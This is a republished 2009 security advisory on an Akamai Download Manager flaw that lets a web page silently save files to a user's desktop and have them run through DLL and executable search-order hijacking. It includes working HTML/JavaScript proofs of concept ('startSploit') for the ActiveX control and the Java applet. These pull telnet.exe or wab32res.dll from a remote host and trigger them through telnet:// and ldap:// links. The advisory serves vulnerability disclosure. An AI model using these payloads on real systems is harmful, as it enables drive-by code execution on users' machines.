Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24371
HistoryAug 05, 2010 - 12:00 a.m.

Akamai Download Manager arbitrary file download & execution

2010-08-0500:00:00
vulners.com
16

Akamai Download Manager arbitrary file download & execution

Yorick Koster, April 2009


Abstract

Akamai's Download Manager allows attackers to download arbitrary
files onto a user's desktop. Using a so-called "blended
threat" attack it is possible to execute arbitrary code. This
attack affects the ActiveX control as well as the Java applet.


Tested version

This issue was tested on Akamai Download Manager version 2.2.4.8 using
Windows XP SP3 running Internet Explorer 6, 7 & 8 and Windows Vista
running Internet Explorer 8.


Fix

Akamai reports that this vulnerability should have been fixed in version
2.2.5.4 of the Akamai Download Manager for both Java and ActiveX.
Specifically, both the Java and ActiveX versions ignore the
configuration option target when set to DESKTOP.

The latest version of Akamai Download Manager can be obtained using the
following URL:
http://dlm.tools.akamai.com/tools/upgrade.html


Introduction

Download Manager provides a simplified method of distributing,
downloading,and installing digitized assets via the Internet. Download
Manager is available as an ActiveX component or Java applet. The ActiveX
control persists on the user's system unless it is deleted
manually. Download Manager is used by many vendors including Microsoft,
McAfee, Symantec, Citrix and Adobe.

Over the years, browser vendors have added measures to their browsers to
prevent users from running unwanted software. Download managers on the
other hand have not adopted these measures as they generally want to
make this task as easy as possible for end users. The process of
downloading and running a file looks and feels different from what users
are used to. This alone may cause users to make the wrong decisions,
causing them to run unwanted/untrusted software.

The HTML code needed to start a download using the ActiveX control looks
something like the following code:

<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8&quot; width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe&quot;/&gt;
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>

The object tag contains the classid of the ActiveX control. The
(optional) codebase attribute contains a link to the installation files
in case Download Manager is not yet installed on the user's system.
The URL parameter contains a link to the file that needs to be
downloaded.

The download is started using the StartDownload method of the ActiveX
control. When the download starts, the ActiveX control creates a
temporary configuration file after which it invokes a separate program
(Manager.exe) that performs the download. Download Manager will first
ask the user where the file has to be saved (figure 1).

http://www.akitasecurity.nl/advisory/AK20090402/001_dlm_save_as_dialog.png
Figure 1: Download Manager Save As dialog

If the user chooses to save the file, the download window is displayed.
This window shows a summary overview of all downloads. An example of
this window is displayed in figure 2.

http://www.akitasecurity.nl/advisory/AK20090402/002_dlm_manager_exe_download_window.png
Figure 2: Manager.exe download window

After the download is finished, the user can execute the file using the
Launch button. It is also possible to automatically execute the file.
This can be done by adding an extra parameter named launch to the object
tag with its value set to yes. In this case, the user is presented with
a warning dialog as is shown in figure 3. Notice that this dialog
contains little information about the download. For example it does not
show if the file is signed and by whom.

<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe&quot;/&gt;
<PARAM name="launch" value="yes"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>

http://www.akitasecurity.nl/advisory/AK20090402/003_dlm_launch_file_warning_dialog.png
Figure 3: Download Manager launch warning dialog

It should be noted that if Download Manager is started from Internet
Explorer on Windows Vista, an extra warning dialog is displayed when
Internet Explorer runs in Protected Mode. This warning is displayed as
Download Manager tries to start Manager.exe with the privileges of the
currently logged on user, thus elevating from the low integrity Internet
Explorer process.

http://www.akitasecurity.nl/advisory/AK20090402/004_dlm_open_outside_protected_mode.png
Figure 4: Running Download Manager outside Protected Mode


Hiding the Download Manager window

When the download is started, Download Manager shows the download
progress in a separate window. By default this window shows a summary of
all downloads. It is possible to show only the progress of one download
using the initialView parameter. Setting this to the value single will
cause Download Manager to only display (detailed) information about one
download.

<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe&quot;/&gt;
<PARAM name="launch" value="yes"/>
<PARAM name="initialView" value="single"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>

Setting the initialView parameter to embedded will cause Download
Manager to display no window at all.

<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe&quot;/&gt;
<PARAM name="launch" value="yes"/>
<PARAM name="initialView" value="embedded"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>


Hiding the Save As dialog

Through the target parameter, it is possible to determine where the
files are saved. If this parameter is not set or is empty, users are
asked to select a location. If the value is set to AUTO, the files are
saved within the user's temporary folder (i.e. C:\Documents and
Settings\Administrator\Local Settings\Temp\). If the target parameter is
set to DESKTOP, files are saved on the user's desktop. For
example:

<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe&quot;/&gt;
<PARAM name="launch" value="yes"/>
<PARAM name="initialView" value="embedded"/>
<PARAM name="target" value="DESKTOP"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>

The Save dialog is not shown if the target parameter is set to either
AUTO or DESKTOP. Consequently, the only way to prevent code execution is
by clicking Cancel in the warning dialog shown in figure 3. Of course,
in order to do so an attacker has to convince or lure the target user
into viewing a malicious website.


Executing arbitrary downloads

The only (currently known) way to not show the launch warning dialog is
to not execute the download through Download Manager. Another method has
to be found to get the download executed. One way of doing this is by
abusing the Dynamic-Link Library Search Order [2]. If a program is
started that has its current work directory set to the user's
desktop folder, it will search this folder for DLLs that need to be
loaded. Using Download Manager, it is possible to create arbitrary DLL
files on the desktop that are loaded when this program is started. An
example of such a program is Internet Explorer. This trick is also used
to exploit the Safari Carpet Bomb [3] vulnerability (see also
http://aviv.raffon.net/2009/04/14/ALaCOREImpact.aspx&#41;.

With the release of MS09-014 [4] and MS09-015 [5] Microsoft has
implemented mitigating measures that should prevent this kind of attack
(see also Microsoft Security Advisory 953818 [6]). Even though Microsoft
has implemented these security measures, there are still ways to
execute a file located on the user's desktop. A couple of examples
are given in this document. This is a non-exhaustive list, other methods
exist.

Notepad.exe

In Internet Explorer 6, when a user wants to view the (HTML) source of a
web page, by default Internet Explorer starts Notepad. This is done
without providing an absolute path name. Because of this, Windows will
first look in the current working directory to see if a file named
notepad.exe exists. If this is the case, Windows will execute this file.
Using Download Manager it is possible to create such a file on the
user's desktop. Prior to Windows XP SP2, it is possible to
automatically start Notepad using a view-source: link, i.e.
view-source:http://www.microsoft.com.

The view-source protocol was disabled in Service Pack 2 for Windows XP
(and later). See also
http://msdn.microsoft.com/en-us/library/aa767742.aspx.

Telnet.exe

In a similar manner, if Internet Explorer (prior to IE7) loads a telnet
URL it will start the Telnet client using a relative path name. If an
executable named telnet.exe exists on the desktop, this executable will
be started instead of the real Telnet client. In Internet Explorer 7,
Microsoft disabled the use of telnet URLs (see also
http://msdn.microsoft.com/en-us/library/aa767741&#40;VS.85&#41;.aspx&#41;.

<html><head><script type="text/javascript">
function startSploit()
{
if(dm.detachEvent != undefined)
{
setTimeout("location.href='telnet://localhost/'", 5000);
dm.StartDownload();
}
}
</script></head>
<body onload="startSploit()">
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/telnet.exe&quot;/&gt;
<PARAM name="launch" value="no"/>
<PARAM name="initialView" value="embedded"/>
<PARAM name="target" value="DESKTOP"/>
</object>
</body></html>

Rundll32.exe

In Internet Explorer 7 when a user deletes her browsing history,
rundll32.exe is started using a relative path name. By placing an
executable named rundll32.exe and convincing the user to delete her
browsing history, it is possible to have this executable launched.

http://www.akitasecurity.nl/advisory/AK20090402/005_ie_delete_browsing_history.png
Figure 5: Delete Browsing History

wab32res.dll

Windows allows applications to register itself to handle a particular
URL protocol. For example if Adobe Reader is installed, it will add a
protocol handler for the acrobat protocol. If Internet Explorer
encounters such an URL, it will search the Registry and it will execute
the registered application. Some applications will search the desktop
for DLLs or executables. One such an application is wab.exe (Windows
Contacts), which is launched for ldap URLs, for example ldap://billyg.
When wab.exe is started, it tries to load the DLL wab32res.dll. If such
a file exists on the user's desktop, it will use this DLL.
Consequently, this allows attackers to execute arbitrary code with the
privileges of the target user. A proof of concept is given below:

<html><head><script type="text/javascript">
function startSploit()
{
if(dm.detachEvent != undefined)
{
setTimeout("location.href='ldap://billyg/'", 5000);
dm.StartDownload();
}
}
</script></head>
<body onload="startSploit()">
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/wab32res.dll&quot;/&gt;
<PARAM name="launch" value="no"/>
<PARAM name="initialView" value="embedded"/>
<PARAM name="target" value="DESKTOP"/>
</object>
</body></html>

It should be noted that in Internet Explorer 8, Microsoft has
implemented an extra warning dialog for custom protocol handlers. It
warns users that they are about to launch an external program. Thus, for
an attack to be successful, target user will have to allow the Windows
Contacts program to be executed. An example of such a warning dialog is
shown in figure 6.

http://www.akitasecurity.nl/advisory/AK20090402/006_ie8_ldap_protocol_warning.png
Figure 6: Browser warning when opening ldap URLs

In addition, on Windows Vista, Windows Contacts will be started outside
Protected Mode. Because of this, a second warning dialog will be shown.

http://www.akitasecurity.nl/advisory/AK20090402/007_wab_open_outside_protected_mode.png
Figure 7: Running Windows Contacts outside Protected Mode


Java applet

As stated in the introduction, Download Manager is available as an
ActiveX component or Java applet. Although this document focuses on the
ActiveX control, the Java applet is similarly affected by this issue.
Since, the applet requires access to the local file system, the applet
is signed by Akamai. When the applet is loaded, a warning dialog is
displayed to the end user. Through this dialog, the user can give the
applet access to his file system. An example of this dialog is displayed
in figure 8.

Notice that the checkbox option "Always trust content from this
publisher" is enabled by default. If this box is ticked and the
user chooses to run the applet, the warning dialog will not be shown any
longer for any applet that is signed by this publisher, in this case
Akamai. This is problematic if any applet of Akamai contains a
vulnerability, because an attacker can host a vulnerable version of this
applet on a server under the attacker's control. The (vulnerable)
applet will automatically load if the user "trusts" the
publisher. There is no killbit equivalent for Java applets.

http://www.akitasecurity.nl/advisory/AK20090402/008_java_digital_signature_warning.png
Figure 8: Java security warning for digitally signed applets

A modified version of the proof of concept using the Java applet is
listed below:

<html><head><script type="text/javascript">
function loadLdapUrl()
{
setTimeout("location.href='ldap://billyg/'", 8000);
}
</script></head>
<body onload="loadLdapUrl()">
<applet code="com.akamai.dm.ui.applet.DMApplet.class"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/java&quot;
archive="dlm-java-2.2.4.8.jar" name="Download Manager" id="dm" width="1"
height="1" mayscript>
<PARAM name="jscomm" value="true"/>
<PARAM name="codebaseURL"
value="http://dlm.tools.akamai.com/dlmanager/versions/java/dlm-java-2.2.4.8.jar&quot;/&gt;
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/wab32res.dll&quot;/&gt;
<PARAM name="launch" value="no"/>
<PARAM name="initialView" value="embedded"/>
<PARAM name="target" value="DESKTOP"/>
</applet>
</body></html>


Final note

Apart from the weak dialog boxes in Download Manager it can be said that
the code execution vulnerability is not only caused by Download
Manager. It is possible because it uses what Microsoft calls a
"blended threat" attack (953818 [7]). Allowing an attacker to
store arbitrary files on a known or predictable location is always a bad
idea. Combined with other issues, in many cases, this can lead to
arbitrary code execution. Even a local HTML file can be used for
malicious actions.

Although ActiveX is potentially dangerous as it is generally implemented
in native code and runs with the same privileges as the browser,
Microsoft has made great progress in improving its security. Examples of
these improvements are, ActiveX Opt-In, Per-User ActiveX, Per-Site
ActiveX, Protected Mode and UAC. The security of Java applets is lagging
behind. The default option of trusting all code from one publisher is
flawed. Publishers that distribute a lot of Java applets, are more
likely to distribute vulnerable applets. Since signed applets are
equivalent to ActiveX controls, this can lead to a full compromise of
user's systems.


References

[1] http://www.akitasecurity.nl/advisory.php?id=AK20090402
[2] http://msdn.microsoft.com/en-us/library/ms682586.aspx
[3]
http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html
[4] http://www.microsoft.com/technet/security/Bulletin/MS09-014.mspx
[5] http://www.microsoft.com/technet/security/Bulletin/MS09-015.mspx
[6] http://www.microsoft.com/technet/security/advisory/953818.mspx
[7] http://www.microsoft.com/technet/security/advisory/953818.mspx


Akita Software Security (Kvk 37144957)
http://www.akitasecurity.nl/

Key fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65
http://pgp.mit.edu:11371/pks/lookup?op=get&amp;search=0x5482D26ED8905A65